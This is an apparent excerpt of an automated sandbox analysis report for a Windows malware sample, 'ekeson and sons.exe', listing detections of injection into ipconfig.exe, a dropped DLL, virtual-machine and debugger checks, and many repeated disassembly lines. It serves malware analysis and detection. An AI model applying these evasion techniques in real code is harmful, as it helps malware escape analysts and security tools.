      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F79F89 push ecx; ret 10_2_02F79F8A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F7B46C push eax; ret 10_2_02F7B472
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F75C3B push EF9E65E4h; retf 10_2_02F75C7E
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F7B402 push eax; ret 10_2_02F7B408
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F7B40B push eax; ret 10_2_02F7B472

      Persistence and Installation Behavior:

      barindex
      Uses ipconfig to lookup or modify the Windows network settingsShow sources
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
      Source: C:\Users\user\Desktop\ekeson and sons.exeFile created: C:\Users\user\AppData\Local\Temp\nsdD06F.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\ekeson and sons.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\ekeson and sons.exeRDTSC instruction interceptor: First address: 00000000004385E4 second address: 00000000004385EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ekeson and sons.exeRDTSC instruction interceptor: First address: 000000000043897E second address: 0000000000438984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002F685E4 second address: 0000000002F685EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002F6897E second address: 0000000002F68984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ekeson and sons.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB6A60 rdtscp 1_2_00AB6A60
      Source: C:\Windows\explorer.exe TID: 5756Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exe TID: 7092Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00405E61 FindFirstFileA,FindClose,1_2_00405E61
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0040263E FindFirstFileA,1_2_0040263E
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_0040548B
      Source: explorer.exe, 00000003.00000000.380492957.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 00000003.00000000.380543567.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000003.00000000.380280175.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000003.00000000.375678299.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000003.00000000.374262037.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000003.00000000.380492957.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000003.00000000.375678299.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000003.00000000.380280175.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
      Source: explorer.exe, 00000003.00000000.374262037.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: explorer.exe, 00000003.00000000.374262037.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000003.00000000.380280175.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 00000003.00000000.380543567.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
      Source: explorer.exe, 00000003.00000000.389978846.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
      Source: explorer.exe, 00000003.00000000.374262037.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\ekeson and sons.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\ekeson and sons.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB6A60 rdtscp 1_2_00AB6A60
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AC98F0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405E88
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC90AF mov eax, dword ptr fs:[00000030h]1_2_00AC90AF
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB20A0 mov eax, dword ptr fs:[00000030h]1_2_00AB20A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB20A0 mov eax, dword ptr fs:[00000030h]1_2_00AB20A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB20A0 mov eax, dword ptr fs:[00000030h]1_2_00AB20A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB20A0 mov eax, dword ptr fs:[00000030h]1_2_00AB20A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB20A0 mov eax, dword ptr fs:[00000030h]1_2_00AB20A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB20A0 mov eax, dword ptr fs:[00000030h]1_2_00AB20A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ABF0BF mov ecx, dword ptr fs:[00000030h]1_2_00ABF0BF
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ABF0BF mov eax, dword ptr fs:[00000030h]1_2_00ABF0BF
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ABF0BF mov eax, dword ptr fs:[00000030h]1_2_00ABF0BF
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A89080 mov eax, dword ptr fs:[00000030h]1_2_00A89080
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B03884 mov eax, dword ptr fs:[00000030h]1_2_00B03884
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B03884 mov eax, dword ptr fs:[00000030h]1_2_00B03884
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A858EC mov eax, dword ptr fs:[00000030h]1_2_00A858EC
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B1B8D0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B1B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00B1B8D0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B1B8D0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B1B8D0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B1B8D0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B1B8D0 mov eax, dword ptr fs:[00000030h]1_2_00B1B8D0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A9B02A mov eax, dword ptr fs:[00000030h]1_2_00A9B02A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A9B02A mov eax, dword ptr fs:[00000030h]1_2_00A9B02A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A9B02A mov eax, dword ptr fs:[00000030h]1_2_00A9B02A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A9B02A mov eax, dword ptr fs:[00000030h]1_2_00A9B02A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB002D mov eax, dword ptr fs:[00000030h]1_2_00AB002D
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB002D mov eax, dword ptr fs:[00000030h]1_2_00AB002D
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB002D mov eax, dword ptr fs:[00000030h]1_2_00AB002D
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB002D mov eax, dword ptr fs:[00000030h]1_2_00AB002D
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB002D mov eax, dword ptr fs:[00000030h]1_2_00AB002D
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B54015 mov eax, dword ptr fs:[00000030h]1_2_00B54015
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B54015 mov eax, dword ptr fs:[00000030h]1_2_00B54015
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B07016 mov eax, dword ptr fs:[00000030h]1_2_00B07016
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B07016 mov eax, dword ptr fs:[00000030h]1_2_00B07016
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B07016 mov eax, dword ptr fs:[00000030h]1_2_00B07016
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B51074 mov eax, dword ptr fs:[00000030h]1_2_00B51074
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B42073 mov eax, dword ptr fs:[00000030h]1_2_00B42073
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AA0050 mov eax, dword ptr fs:[00000030h]1_2_00AA0050
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AA0050 mov eax, dword ptr fs:[00000030h]1_2_00AA0050
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB61A0 mov eax, dword ptr fs:[00000030h]1_2_00AB61A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB61A0 mov eax, dword ptr fs:[00000030h]1_2_00AB61A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B051BE mov eax, dword ptr fs:[00000030h]1_2_00B051BE
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B051BE mov eax, dword ptr fs:[00000030h]1_2_00B051BE
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B051BE mov eax, dword ptr fs:[00000030h]1_2_00B051BE
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B051BE mov eax, dword ptr fs:[00000030h]1_2_00B051BE
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B069A6 mov eax, dword ptr fs:[00000030h]1_2_00B069A6
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AAC182 mov eax, dword ptr fs:[00000030h]1_2_00AAC182
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ABA185 mov eax, dword ptr fs:[00000030h]1_2_00ABA185
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB2990 mov eax, dword ptr fs:[00000030h]1_2_00AB2990
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A8B1E1
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A8B1E1
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A8B1E1
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B141E8 mov eax, dword ptr fs:[00000030h]1_2_00B141E8
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AA4120 mov eax, dword ptr fs:[00000030h]1_2_00AA4120
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AA4120 mov eax, dword ptr fs:[00000030h]1_2_00AA4120
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AA4120 mov eax, dword ptr fs:[00000030h]1_2_00AA4120
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AA4120 mov eax, dword ptr fs:[00000030h]1_2_00AA4120
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AA4120 mov ecx, dword ptr fs:[00000030h]1_2_00AA4120
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB513A mov eax, dword ptr fs:[00000030h]1_2_00AB513A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB513A mov eax, dword ptr fs:[00000030h]1_2_00AB513A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A89100 mov eax, dword ptr fs:[00000030h]1_2_00A89100
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A89100 mov eax, dword ptr fs:[00000030h]1_2_00A89100
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A89100 mov eax, dword ptr fs:[00000030h]1_2_00A89100
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8C962 mov eax, dword ptr fs:[00000030h]1_2_00A8C962
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8B171 mov eax, dword ptr fs:[00000030h]1_2_00A8B171
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8B171 mov eax, dword ptr fs:[00000030h]1_2_00A8B171
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AAB944 mov eax, dword ptr fs:[00000030h]1_2_00AAB944
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AAB944 mov eax, dword ptr fs:[00000030h]1_2_00AAB944
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A852A5 mov eax, dword ptr fs:[00000030h]1_2_00A852A5
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A852A5 mov eax, dword ptr fs:[00000030h]1_2_00A852A5
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A852A5 mov eax, dword ptr fs:[00000030h]1_2_00A852A5
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A852A5 mov eax, dword ptr fs:[00000030h]1_2_00A852A5
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A852A5 mov eax, dword ptr fs:[00000030h]1_2_00A852A5
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A9AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A9AAB0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A9AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A9AAB0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ABFAB0 mov eax, dword ptr fs:[00000030h]1_2_00ABFAB0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ABD294 mov eax, dword ptr fs:[00000030h]1_2_00ABD294
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ABD294 mov eax, dword ptr fs:[00000030h]1_2_00ABD294
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB2AE4 mov eax, dword ptr fs:[00000030h]1_2_00AB2AE4
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB2ACB mov eax, dword ptr fs:[00000030h]1_2_00AB2ACB
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC4A2C mov eax, dword ptr fs:[00000030h]1_2_00AC4A2C
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC4A2C mov eax, dword ptr fs:[00000030h]1_2_00AC4A2C
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A98A0A mov eax, dword ptr fs:[00000030h]1_2_00A98A0A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AA3A1C mov eax, dword ptr fs:[00000030h]1_2_00AA3A1C
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A85210 mov eax, dword ptr fs:[00000030h]1_2_00A85210
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A85210 mov ecx, dword ptr fs:[00000030h]1_2_00A85210
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A85210 mov eax, dword ptr fs:[00000030h]1_2_00A85210
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A85210 mov eax, dword ptr fs:[00000030h]1_2_00A85210
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h]1_2_00A8AA16
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h]1_2_00A8AA16
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B3B260 mov eax, dword ptr fs:[00000030h]1_2_00B3B260
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B3B260 mov eax, dword ptr fs:[00000030h]1_2_00B3B260
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC927A mov eax, dword ptr fs:[00000030h]1_2_00AC927A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B58A62 mov eax, dword ptr fs:[00000030h]1_2_00B58A62
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B4EA55 mov eax, dword ptr fs:[00000030h]1_2_00B4EA55
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B14257 mov eax, dword ptr fs:[00000030h]1_2_00B14257
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A89240 mov eax, dword ptr fs:[00000030h]1_2_00A89240
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A89240 mov eax, dword ptr fs:[00000030h]1_2_00A89240
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A89240 mov eax, dword ptr fs:[00000030h]1_2_00A89240
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A89240 mov eax, dword ptr fs:[00000030h]1_2_00A89240
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB4BAD mov eax, dword ptr fs:[00000030h]1_2_00AB4BAD
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB4BAD mov eax, dword ptr fs:[00000030h]1_2_00AB4BAD
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB4BAD mov eax, dword ptr fs:[00000030h]1_2_00AB4BAD
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B55BA5 mov eax, dword ptr fs:[00000030h]1_2_00B55BA5
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A91B8F mov eax, dword ptr fs:[00000030h]1_2_00A91B8F
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A91B8F mov eax, dword ptr fs:[00000030h]1_2_00A91B8F
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B3D380 mov ecx, dword ptr fs:[00000030h]1_2_00B3D380
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ABB390 mov eax, dword ptr fs:[00000030h]1_2_00ABB390
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB2397 mov eax, dword ptr fs:[00000030h]1_2_00AB2397
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B4138A mov eax, dword ptr fs:[00000030h]1_2_00B4138A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AADBE9 mov eax, dword ptr fs:[00000030h]1_2_00AADBE9
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB03E2 mov eax, dword ptr fs:[00000030h]1_2_00AB03E2
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB03E2 mov eax, dword ptr fs:[00000030h]1_2_00AB03E2
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB03E2 mov eax, dword ptr fs:[00000030h]1_2_00AB03E2
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB03E2 mov eax, dword ptr fs:[00000030h]1_2_00AB03E2
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB03E2 mov eax, dword ptr fs:[00000030h]1_2_00AB03E2
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB03E2 mov eax, dword ptr fs:[00000030h]1_2_00AB03E2
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B053CA mov eax, dword ptr fs:[00000030h]1_2_00B053CA
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B053CA mov eax, dword ptr fs:[00000030h]1_2_00B053CA
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B4131B mov eax, dword ptr fs:[00000030h]1_2_00B4131B
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A8DB60
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB3B7A mov eax, dword ptr fs:[00000030h]1_2_00AB3B7A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB3B7A mov eax, dword ptr fs:[00000030h]1_2_00AB3B7A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8DB40 mov eax, dword ptr fs:[00000030h]1_2_00A8DB40
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B58B58 mov eax, dword ptr fs:[00000030h]1_2_00B58B58
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8F358 mov eax, dword ptr fs:[00000030h]1_2_00A8F358
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A9849B mov eax, dword ptr fs:[00000030h]1_2_00A9849B
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B06CF0 mov eax, dword ptr fs:[00000030h]1_2_00B06CF0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B06CF0 mov eax, dword ptr fs:[00000030h]1_2_00B06CF0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B06CF0 mov eax, dword ptr fs:[00000030h]1_2_00B06CF0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B414FB mov eax, dword ptr fs:[00000030h]1_2_00B414FB
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B58CD6 mov eax, dword ptr fs:[00000030h]1_2_00B58CD6
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ABBC2C mov eax, dword ptr fs:[00000030h]1_2_00ABBC2C
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B41C06 mov eax, dword ptr fs:[00000030h]1_2_00B41C06
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B5740D mov eax, dword ptr fs:[00000030h]1_2_00B5740D
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B5740D mov eax, dword ptr fs:[00000030h]1_2_00B5740D
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B5740D mov eax, dword ptr fs:[00000030h]1_2_00B5740D
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B06C0A mov eax, dword ptr fs:[00000030h]1_2_00B06C0A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B06C0A mov eax, dword ptr fs:[00000030h]1_2_00B06C0A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B06C0A mov eax, dword ptr fs:[00000030h]1_2_00B06C0A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B06C0A mov eax, dword ptr fs:[00000030h]1_2_00B06C0A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AA746D mov eax, dword ptr fs:[00000030h]1_2_00AA746D
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ABA44B mov eax, dword ptr fs:[00000030h]1_2_00ABA44B
